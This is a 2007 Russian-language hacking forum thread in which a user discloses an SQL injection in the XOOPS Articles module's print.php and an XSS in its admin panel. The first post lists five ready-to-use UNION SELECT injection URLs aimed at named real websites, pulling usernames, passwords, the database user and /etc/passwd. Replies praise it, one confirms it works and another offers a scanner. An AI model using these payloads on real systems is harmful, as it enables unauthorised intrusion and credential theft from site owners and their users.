[xoops]

Discussion in 'Уязвимости' started by ice1k, 2 Mar 2007.

  1. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Сейчас вот нарыл в Xoops'e одну вещь... Нигде в багтраках не видел этой уязвимости...

    Программа: Xoops(пока что х3 до какой версии + должен присутствовать модуль - Articles)

    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в сценарии print.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
    http://victim/modules/articles/print.php?id=-1{code}

    URL производителя: www.xoops.org

    Вот реальные примеры:

    Code:
    http://www.irc.by/modules/articles/print.php?id=-99+union+select+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(uname,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
    Code:
    http://www.xoops2.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,convert(user()+using+cp1251),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops2_users/*
    Code:
    http://www.xoops.pl/modules/articles/print.php?id=-99+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+manga_users/*
    Code:
    http://www.dolbin.ru/modules/articles/print.php?id=-99+union+select+1,2,3,4,concat(uname,0x3a,pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+xoops_users/*
    Code:
    http://www.titanic.com/modules/articles/print.php?id=-99+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user/*
    (c)ice1k :: AltST
     
    #1 ice1k, 2 Mar 2007
    Last edited: 3 Mar 2007
    5 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    зачёт +
    молодец
     
    #2 Spyder, 2 Mar 2007
  3. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Кстати... Если где-то вдруг это было - отпишитесь плз...
     
    #3 ice1k, 2 Mar 2007
  4. CBuH

    CBuH Banned

    Joined:
    25 Jan 2007
    Messages:
    41
    Likes Received:
    7
    Reputations:
    0
    неплохо, зачёт адназначна :)
     
    #4 CBuH, 3 Mar 2007
  5. chezz

    chezz Member

    Joined:
    19 Feb 2007
    Messages:
    33
    Likes Received:
    9
    Reputations:
    0
    Респект, работает! Ставлю +.
     
    #5 chezz, 3 Mar 2007
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Программа: XOOPS 2.0.16, возможно более ранние версии.

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.
    Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "tplset" и "module"(при определенных условиях, приведенных в
    примерах) в сценарии /modules/system/admin.php. Удаленный пользователь может
    с помощью специально сформированного запроса выполнить произвольный код
    сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для
    успешной эксплуатации уязвимости целевой пользователь должен быть залогинен
    как администратор.

    Examples:
    Code:
    victim.xxx/modules/system/admin.php?fct=tplsets&op=listtpl&tplset=[XSS-here]&moddir=system
    Code:
    victim.xxx/modules/system/admin.php?fct=modulesadmin&op=install&module=[XSS-here]
    URL производителя: http://xoops.org

    (с)ice1k :: AltST
     
    #6 ice1k, 3 Mar 2007
    Last edited: 3 Mar 2007
  7. DIAgen

    DIAgen Banned Life!

    Joined:
    2 May 2006
    Messages:
    1,055
    Likes Received:
    376
    Reputations:
    460
    Вот держите сканер этой баги
     
    #7 DIAgen, 3 Mar 2007
    Last edited: 3 Mar 2007
  8. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    респект ;)
     
    #8 p-range, 3 Mar 2007
  9. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    а это ты зря... не нужно "развивать" скрипт-киддисов... :rolleyes:
     
    #9 ice1k, 3 Mar 2007
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.